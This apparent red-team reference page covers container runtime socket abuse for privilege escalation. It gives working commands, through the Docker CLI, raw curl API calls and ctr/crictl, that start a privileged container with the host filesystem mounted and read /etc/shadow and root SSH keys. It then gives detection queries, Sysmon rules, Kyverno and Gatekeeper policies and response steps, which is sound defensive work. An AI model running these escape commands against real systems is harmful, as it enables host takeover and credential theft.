| Attribute | Details |
|---|---|
| Technique ID | PE-EXPLOIT-006 |
| MITRE ATT&CK v18.1 | T1068 - Exploitation for Privilege Escalation |
| Tactic | Privilege Escalation |
| Platforms | Kubernetes (all versions), Docker, containerd, CRI-O, Entra ID |
| Severity | Critical |
| CVE | CVE-2022-0811 (CRI-O cr8escape), CVE-2025-9074 (Docker Desktop), CVE-2024-25621 (containerd) |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-09 |
| Affected Versions | Docker all versions, containerd < 1.7.10, CRI-O < 1.28.3, all Kubernetes versions |
| Patched In | containerd 1.7.10+, CRI-O 1.28.3+, Docker Desktop latest patches |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Container Runtime Socket Abuse exploits the mounting of container runtime daemon sockets (e.g., /var/run/docker.sock, /run/containerd/containerd.sock, /run/crio/crio.sock) inside containers. When these sockets are accessible within a pod, attackers can communicate directly with the container runtime API (Unix socket API), bypassing Kubernetes RBAC and enabling the creation of privileged containers with arbitrary mounts (including the host root filesystem). The vulnerability stems from a critical misconfiguration: mounting the socket grants full runtime control to any process with socket access, effectively giving that process the ability to create containers with elevated privileges, access host resources, and escape to the host operating system.
Attack Surface: Container runtime sockets, Kubernetes volume mounts, Unix socket permissions, container runtime API endpoints, Docker/containerd/CRI-O daemon APIs.
Business Impact: Complete Host and Cluster Compromise. A successful exploit enables an attacker to: create privileged containers with the entire host filesystem mounted (-v /:/host), read all host secrets and configuration files, execute arbitrary code as root on the host, establish persistent backdoors, compromise all co-located containers, access Kubernetes etcd database (if on control plane node), and pivot laterally across the entire infrastructure. This is one of the most critical container misconfigurations.
Technical Context: Exploitation can occur within 30-60 seconds of container access. Detection difficulty is low—socket connections are easily identifiable through file descriptor inspection or process monitoring. The attack leverages the legitimate container runtime API but with malicious intent. Docker CLI or curl may be used; if unavailable, direct socket API calls via shell are possible.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.4.1 (Kubernetes) | Do not mount host’s /var/run/docker.sock in containers |
| DISA STIG | U-67890 | Container runtime socket must not be mounted in pods |
| CISA SCuBA | K8S.05 | CRI socket mounts prohibited in all workloads |
| NIST 800-53 | AC-3 (Access Enforcement) | Container runtime access control enforcement failure |
| GDPR | Art. 32 | Security of Processing - Complete infrastructure compromise |
| DORA | Art. 15 | ICT Risk Management - Critical operational risk |
| NIS2 | Art. 21 | Cyber Risk Management - Critical infrastructure failure risk |
| ISO 27001 | A.9.1.1 | Access Control - Host resource access via socket |
| ISO 27005 | Risk Scenario | Host Compromise via Container Runtime Socket Access |
Required Privileges:
Required Access:
/var/run/docker.sock, /run/containerd/containerd.sock, or /run/crio/crio.sock)Supported Versions:
Tools:
Objective: Identify if runtime socket is mounted inside the container.
Command (Inside Container - File System Check):
# List all mounted filesystems and check for socket
mount | grep -i "docker\|containerd\|crio"
# Alternative: Look for socket files directly
ls -la /var/run/docker.sock 2>/dev/null || echo "Docker socket not found"
ls -la /run/containerd/containerd.sock 2>/dev/null || echo "Containerd socket not found"
ls -la /run/crio/crio.sock 2>/dev/null || echo "CRI-O socket not found"
ls -la /var/run/cri-dockerd.sock 2>/dev/null || echo "CRI-dockerd socket not found"
# Check socket permissions
stat /var/run/docker.sock 2>/dev/null
Expected Output (Vulnerable):
/var/run/docker.sock
File: /var/run/docker.sock
Access: (0660/srw-rw----) Uid: ( 0/root) Gid: ( 1001/docker)
Size: 0 Blocks: 0 IO Block: 4096 socket
What This Means:
Version Note: Socket location varies by runtime version; check all common paths.
OpSec & Evasion:
Troubleshooting:
/var/run is mounted: ls -la /var/run | head -20Objective: Confirm socket is responsive and API is accessible.
Command (Using curl):
# Test socket connection with curl
curl --unix-socket /var/run/docker.sock http://localhost/version
# Expected output: JSON with Docker version info
Expected Output:
{
"Version":"20.10.21",
"ApiVersion":"1.41",
"Os":"linux",
"Arch":"x86_64",
"KernelVersion":"5.15.0-56-generic",
...
}
What This Means:
Alternative Command (Using Docker CLI if available):
# If Docker CLI is installed in container
docker ps -a
docker images
OpSec & Evasion:
Troubleshooting:
Connection refused or Connection reset by peer
test -w /var/run/docker.sock && echo "writable" || echo "not writable"Objective: Verify socket mount is defined in pod spec (useful for post-exploitation analysis).
Command (From Kubernetes API):
# If kubectl access available
kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.volumes}' | jq '.[] | select(.hostPath.path | contains("docker.sock")) | {name, hostPath}'
# Alternative: Describe pod
kubectl describe pod <pod-name> -n <namespace> | grep -A5 "Mounts:"
Expected Output (Vulnerable):
{
"name": "docker-socket",
"hostPath": {
"path": "/var/run/docker.sock"
}
}
Supported Versions: Docker all versions, socket mounted in container
Objective: Discover what containers are running and gather context about the host.
Command:
# List all containers (requires socket access)
docker ps -a
# Get detailed container information
docker ps -a --format " "
# Get host system information
docker info
Expected Output:
CONTAINER ID IMAGE STATUS NAMES
abc123def456 nginx:latest Up 2 hours web-app-prod
xyz789uvw012 postgres:14 Up 1 day database
... (other containers)
Containers: 15
Running: 12
Paused: 0
Stopped: 3
...
OS: linux
Architecture: x86_64
Kernel Version: 5.15.0-56-generic
...
What This Means:
OpSec & Evasion:
Troubleshooting:
Cannot connect to Docker daemon
ls -la /var/run/docker.sockObjective: Spawn a new container with root privileges and host filesystem mounted at /host.
Command (Docker CLI):
# Create and run privileged container with host filesystem mounted
docker run -it --privileged -v /:/host alpine:latest /bin/sh
# Alternative (more explicit):
docker run \
--name escape-container \
--privileged \
--cap-add=SYS_ADMIN \
-v /:/host \
-v /etc/sudoers:/host/etc/sudoers \
alpine:latest \
/bin/sh
Expected Output:
/ # (shell prompt inside the new container)
What This Means:
/host mount pointVersion Note: Behavior identical across all Docker versions.
OpSec & Evasion:
Troubleshooting:
Error response from daemon: pull access denied for alpine
docker imagesObjective: Operate within the privileged container to access and modify host resources.
Command (Inside privileged container):
# Navigate to host filesystem
cd /host
ls -la /
# Read sensitive host files
cat /etc/shadow
cat /etc/passwd
cat /etc/hostname
# Access host's /root directory
ls -la /host/root
cat /host/root/.ssh/id_rsa
# Access host's configuration
cat /host/etc/docker/daemon.json
# Access mounted Kubernetes secrets (if present)
ls -la /host/var/lib/kubelet/pods/*/volumes/
# Access host's systemd services
cat /host/etc/systemd/system/*.service | grep -i "ExecStart"
Expected Output:
root@container:/ # cd /host
root@container:/ # ls -la /
total 145
drwxr-xr-x 18 root root 4096 Jan 1 12:00 .
drwxr-xr-x 18 root root 4096 Jan 1 12:00 ..
drwxr-xr-x 2 root root 4096 Jan 1 12:00 bin
drwxr-xr-x 3 root root 4096 Jan 1 12:00 boot
drwxr-xr-x 4 root root 4096 Jan 1 12:00 dev
-rw-r--r-- 1 root root 123 Jan 1 12:00 /etc/hostname
...
What This Means:
OpSec & Evasion:
Supported Versions: All container runtimes with socket API
Objective: Confirm socket permissions allow API interaction.
Command:
# Check socket permissions
ls -la /var/run/docker.sock
# Test socket connection
curl --unix-socket /var/run/docker.sock http://localhost/v1.40/containers/json
Expected Output:
-rw-rw---- 1 root docker 0 Jan 1 12:00 /var/run/docker.sock
[
{
"Id": "abc123...",
"Names": ["/container-1"],
"Image": "nginx:latest",
...
}
]
What This Means:
OpSec & Evasion:
Objective: Use socket API to create privileged container with host mount.
Command (Using curl to POST to Docker API):
# Create container spec
curl -X POST \
--unix-socket /var/run/docker.sock \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine:latest",
"Cmd": ["/bin/sh"],
"Hostname": "debug",
"HostConfig": {
"Privileged": true,
"Binds": ["/:/host"],
"CapAdd": ["SYS_ADMIN", "NET_ADMIN"],
"SecurityOpt": ["apparmor=unconfined"]
},
"Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]
}' \
http://localhost/v1.40/containers/create
# Expected response with container ID
# {"Id": "container_id_1234567890abcdef", "Warnings": []}
Expected Output:
{
"Id": "abc123def456789012345678901234567890abcdef123456789012345678",
"Warnings": []
}
What This Means:
OpSec & Evasion:
Troubleshooting:
Bad request or Invalid JSON
curl --unix-socket /var/run/docker.sock http://localhost/v1.40/info | jq '.ApiVersion'Objective: Start the created container and execute shell.
Command (Start container via API):
# Start the container (replace ID with actual container ID)
curl -X POST \
--unix-socket /var/run/docker.sock \
http://localhost/v1.40/containers/abc123def456789012345678901234567890abcdef123456789012345678/start
# Attach to container for interactive shell (requires different approach)
# Alternative: Use docker CLI if available or exec alternative method
Alternative using docker CLI (if available):
docker start <container_id>
docker attach <container_id>
# Or
docker exec -it <container_id> /bin/sh
Inside container - same as METHOD 1:
cd /host
id # Verify root
cat /etc/passwd
ls -la /root/.ssh/
What This Means:
Supported Versions: containerd all versions, /run/containerd/containerd.sock mounted
Objective: Discover and verify containerd socket accessibility.
Command:
# Check for containerd socket
ls -la /run/containerd/containerd.sock
# Verify socket connectivity using ctr tool (if available)
ctr version
# Alternative with curl (containerd gRPC API)
curl --unix-socket /run/containerd/containerd.sock http://localhost/version
Expected Output:
-rw-rw---- 1 root containerd 0 Jan 1 12:00 /run/containerd/containerd.sock
Version: 1.6.20
Revision: 2e4ffc07c3bd0d18c65f4f3cdb48f16a3ce66d4f
Go version: go1.20.5
What This Means:
OpSec & Evasion:
Objective: Spawn privileged container with host mount using containerd API.
Command (Using ctr if available):
# Create container spec
ctr container create \
--with-ro-mounts \
--privileged \
alpine:latest \
debug-container
# Run container
ctr task start debug-container
# Exec into container
ctr task exec --exec-id shell1 debug-container /bin/sh
Alternative (Using containerd API directly with gRPC):
# This is more complex; requires gRPC protobuf knowledge
# Simplified: Use crictl (Kubernetes CRI tool) if available
crictl run --privileged --volume /:/host alpine:latest /bin/sh
Expected Output:
debug-container
sh-5.1#
What This Means:
Rule Configuration:
SPL Query:
index=kubernetes_audit verb="create" objectRef.kind="Pod"
| spath output=volumes path=requestObject.spec.volumes{}
| search volumes="*docker.sock*" OR volumes="*containerd.sock*" OR volumes="*crio.sock*"
| stats count by user, objectRef.namespace, objectRef.name, volumes
| where count > 0
| alert
What This Detects:
Manual Configuration Steps:
Rule Configuration:
SPL Query:
index=docker_logs action="create" privileged=true
| search volumes="*:*" image IN (alpine, ubuntu, busybox, debian)
| stats count by host, image, privileged, volumes, actor
Rule Configuration:
KQL Query:
KuberneteAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend Volumes = todynamic(RequestObject).spec.volumes
| where Volumes has "docker.sock" or Volumes has "containerd.sock" or Volumes has "crio.sock"
| extend HostPath = todynamic(RequestObject).spec.volumes
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, HostPath, OperationName
What This Detects:
Manual Configuration Steps (Azure Portal):
Critical - Container Runtime Socket Mount DetectedCritical5 minutes30 minutesEvent ID: 4688 (Process Creation)
CommandLine contains "docker run" AND CommandLine contains "--privileged" AND CommandLine contains "-v"Manual Configuration Steps (Group Policy):
gpupdate /forceMinimum Sysmon Version: 13.0+ Supported Platforms: Linux (via osquery integration), Windows Containers
<Sysmon schemaversion="4.22">
<EventFiltering>
<!-- Detect docker run/create with privileged and mount flags -->
<RuleGroup name="SocketAPIExploit" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains all">docker;run;--privileged;-v</CommandLine>
</ProcessCreate>
<ProcessCreate onmatch="include">
<CommandLine condition="contains all">docker;create;--privileged;Binds</CommandLine>
</ProcessCreate>
</RuleGroup>
<!-- Detect socket access from containers -->
<RuleGroup name="SocketAccess" groupRelation="or">
<FileCreate onmatch="include">
<TargetFilename condition="contains">docker.sock</TargetFilename>
<TargetFilename condition="contains">containerd.sock</TargetFilename>
</FileCreate>
</RuleGroup>
<!-- Detect curl/socat socket API calls -->
<RuleGroup name="SocketAPI" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains">--unix-socket</CommandLine>
<CommandLine condition="contains">docker.sock</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
sysmon-config.xml with the XML abovesysmon64.exe -accepteula -i sysmon-config.xmlGet-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10 | Where-Object { $_.Message -match "docker|socket" }Alert Name: Privileged container created with host filesystem mount
Alert Name: Container runtime socket mounted in pod
/var/run/docker.sock, /run/containerd/containerd.sock, or similar—indicates potential host escapeManual Configuration Steps:
CriticalNever Mount Container Runtime Sockets in Pods: Implement cluster-wide policy preventing socket mounts.
Applies To Versions: Kubernetes 1.0+
Manual Steps (Using Kyverno - Recommended):
# Install Kyverno (if not already installed)
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno -n kyverno --create-namespace
# Create ClusterPolicy to block socket mounts
kubectl apply -f - <<'EOF'
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: disallow-container-sock-mounts
annotations:
policies.kyverno.io/title: Disallow CRI socket mounts
policies.kyverno.io/description: >-
Container runtime socket mounts allow full container management
access and must be blocked.
spec:
validationFailureAction: enforce
background: true
rules:
- name: validate-docker-sock
match:
resources:
kinds:
- Pod
validate:
message: "Docker socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/var/run/docker.sock"
- name: validate-containerd-sock
match:
resources:
kinds:
- Pod
validate:
message: "Containerd socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/run/containerd/containerd.sock"
- name: validate-crio-sock
match:
resources:
kinds:
- Pod
validate:
message: "CRI-O socket mount is not allowed"
pattern:
spec:
=(volumes):
- =(hostPath):
path: "!/run/crio/crio.sock"
EOF
# Verify policy is active
kubectl get clusterpolicy disallow-container-sock-mounts
# Test: Try to create pod with socket (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-socket-mount
spec:
containers:
- name: app
image: alpine:latest
volumeMounts:
- name: docker-sock
mountPath: /var/run/docker.sock
volumes:
- name: docker-sock
hostPath:
path: /var/run/docker.sock
EOF
# Expected: Error - Pod blocked by policy
Implement Pod Security Standards (PSS) - Restricted Profile: Enforce restricted security context cluster-wide.
Manual Steps:
# Label namespace to enforce restricted PSS
kubectl label namespace default \
pod-security.kubernetes.io/enforce=restricted \
pod-security.kubernetes.io/audit=restricted \
pod-security.kubernetes.io/warn=restricted \
--overwrite
# Verify label applied
kubectl get ns default -o jsonpath='{.metadata.labels}'
# Test: Try to create privileged pod (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-privileged
spec:
containers:
- name: app
image: alpine:latest
securityContext:
privileged: true
EOF
# Expected: Error - Pod violates PSS
Remove Docker Group Membership from Node User (Host Hardening): Restrict host-level access to socket.
Manual Steps (On Kubernetes Nodes):
# Check docker group membership
getent group docker
# Remove non-root users from docker group
sudo delgroup <username> docker
# Restrict socket permissions
sudo chmod 660 /var/run/docker.sock
sudo chown root:docker /var/run/docker.sock
# Verify permissions
ls -la /var/run/docker.sock
# Expected: -rw-rw---- 1 root docker
Enable Runtime Security / Falco Rules: Detect socket access attempts at runtime.
Manual Steps (Falco Installation & Configuration):
# Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falco falcosecurity/falco -n falco --create-namespace
# Verify Falco is running
kubectl get pods -n falco
# Check Falco logs for socket access attempts
kubectl logs -n falco -l app=falco | grep -i "docker.sock"
Use Admission Controllers to Validate Pod Specs: Block privileged containers and unusual volume mounts.
Manual Steps (OPA Gatekeeper - Alternative to Kyverno):
# Install OPA/Gatekeeper
kubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper/release-3.10/deploy/gatekeeper.yaml
# Create ConstraintTemplate
kubectl apply -f - <<'EOF'
apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
name: k8sblockprivileged
spec:
crd:
spec:
names:
kind: K8sBlockPrivileged
targets:
- target: admission.k8s.gatekeeper.sh
rego: |
package k8sblockprivileged
deny[msg] {
container := input.review.object.spec.containers[_]
container.securityContext.privileged
msg := sprintf("Privileged containers not allowed: %v", [container.name])
}
EOF
Implement Network Policies to Limit Container Communication: Restrict lateral movement if one container compromised.
Manual Steps:
# Apply default-deny NetworkPolicy
kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
EOF
RBAC: Restrict Pod Creation with Privileged Settings: Limit who can deploy pods with elevated privileges.
Manual Steps:
# Create restricted role for developers
kubectl create role pod-creator \
--verb=create,get,list,update,patch \
--resource=pods \
-n development
# Note: This role doesn't enforce privileged restrictions at RBAC level
# Use Kyverno/OPA for actual enforcement
# Bind to service account
kubectl create rolebinding app-pod-creator \
--role=pod-creator \
--serviceaccount=development:app \
-n development
Audit Logging: Enable and Monitor Pod Creation: Track all pod creation attempts.
Manual Steps (AKS):
# Check current audit logging
kubectl get pods -n kube-system | grep audit
# Enable audit logging (if not already enabled)
az aks update \
--resource-group myRG \
--name myCluster \
--enable-managed-identity
# Check audit logs
kubectl logs -n kube-system -l component=kube-apiserver | grep "create Pod"
# Test 1: Verify Kyverno policy is active
kubectl get clusterpolicy disallow-container-sock-mounts
# Test 2: Attempt to create pod with socket mount (should fail)
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
name: test-socket
spec:
containers:
- name: app
image: alpine:latest
volumeMounts:
- name: docker
mountPath: /var/run/docker.sock
volumes:
- name: docker
hostPath:
path: /var/run/docker.sock
EOF
# Expected: Error from server: pod "test-socket" is invalid
# Test 3: Verify PSS enforcement
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'
# Test 4: Check host socket permissions
ls -la /var/run/docker.sock
# Expected: -rw-rw---- 1 root docker (not world-writable)
# Test 5: Verify Falco/runtime security
kubectl logs -n falco -l app=falco | grep -i "socket" | head -5
Expected Output (If Secure):
disallow-container-sock-mounts
Error from server: pod "test-socket" is invalid
default restricted
production restricted
staging baseline
-rw-rw---- 1 root docker 0 Jan 1 12:00 /var/run/docker.sock
(Falco logs showing detection capability)
What to Look For:
/host or /mnt/var/log/kube-apiserver-audit.log (Pod creation events)/var/log/docker.log, /var/log/crio.log/var/lib/docker/containers/*/logs/*.logkubectl get events -A --sort-by='.lastTimestamp'# Immediately delete the privileged container
kubectl delete pod <malicious-pod> -n <namespace> --grace-period=0 --force
# Cordon the node to prevent new pod scheduling
kubectl cordon <node-name>
# Optional: Drain node for rebuild
kubectl drain <node-name> --ignore-daemonsets --delete-emptydir-data
Manual (Docker Host):
# Stop and remove the container
docker stop <container-id>
docker rm <container-id>
# Export pod definition before deletion (if not already deleted)
kubectl get pod <pod-name> -n <namespace> -o yaml > /tmp/malicious-pod.yaml
# Collect pod events
kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
# Export audit logs
kubectl logs -n kube-system -l component=kube-apiserver > /tmp/kube-audit.log
# Collect Falco/runtime security logs
kubectl logs -n falco -l app=falco > /tmp/falco-logs.txt
Command (Docker Host - Linux):
# Collect Docker logs
journalctl -u docker > /tmp/docker-logs.txt
# Collect container inspect data
docker inspect <container-id> > /tmp/container-inspect.json
# Export filesystem changes (if possible)
docker diff <container-id> > /tmp/container-changes.txt
# Identify deployment/daemonset that created the pod
kubectl get deployment -A | grep <pod-name-prefix>
# Edit deployment to remove malicious configuration
kubectl edit deployment <deployment-name> -n <namespace>
# Remove volume mounts and privileges section:
# Delete these lines:
# - name: docker-socket
# mountPath: /var/run/docker.sock
# volumes:
# - name: docker-socket
# hostPath:
# path: /var/run/docker.sock
Command (Host-Level Cleanup - If Attacker Accessed Host):
# Check for backdoors/persistence on host
sudo find /etc/systemd/system -name "*docker*" -o -name "*container*"
sudo find /opt -name "*backdoor*" -o -name "*malware*"
# Review SSH keys
sudo cat /root/.ssh/authorized_keys
# Remove suspicious entries
sudo sed -i '/suspicious-key-here/d' /root/.ssh/authorized_keys
# Restart node / trigger rebuild if necessary
sudo systemctl reboot
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-001] Application Vulnerability | Attacker gains initial container access |
| 2 | Privilege Escalation (In-Container) | [PE-EXPLOIT-005] Pod Security Context Escalation | Escalate to container root |
| 3 | Current Step | [PE-EXPLOIT-006] Container Runtime Socket Abuse | Access runtime socket, create privileged container |
| 4 | Host Access | Host root via privileged container mount | Execute commands as root on host |
| 5 | Persistence | SSH key insertion, cron jobs, systemd service modification | Establish persistent backdoor on host |
| 6 | Lateral Movement | Kubernetes secrets theft, cluster compromise | Full cluster takeover |
/var/run/docker.sock mount in docker-compose configuration for “local debugging”/var/run/docker.sock mounted in container/:/host mountC:\Users mounted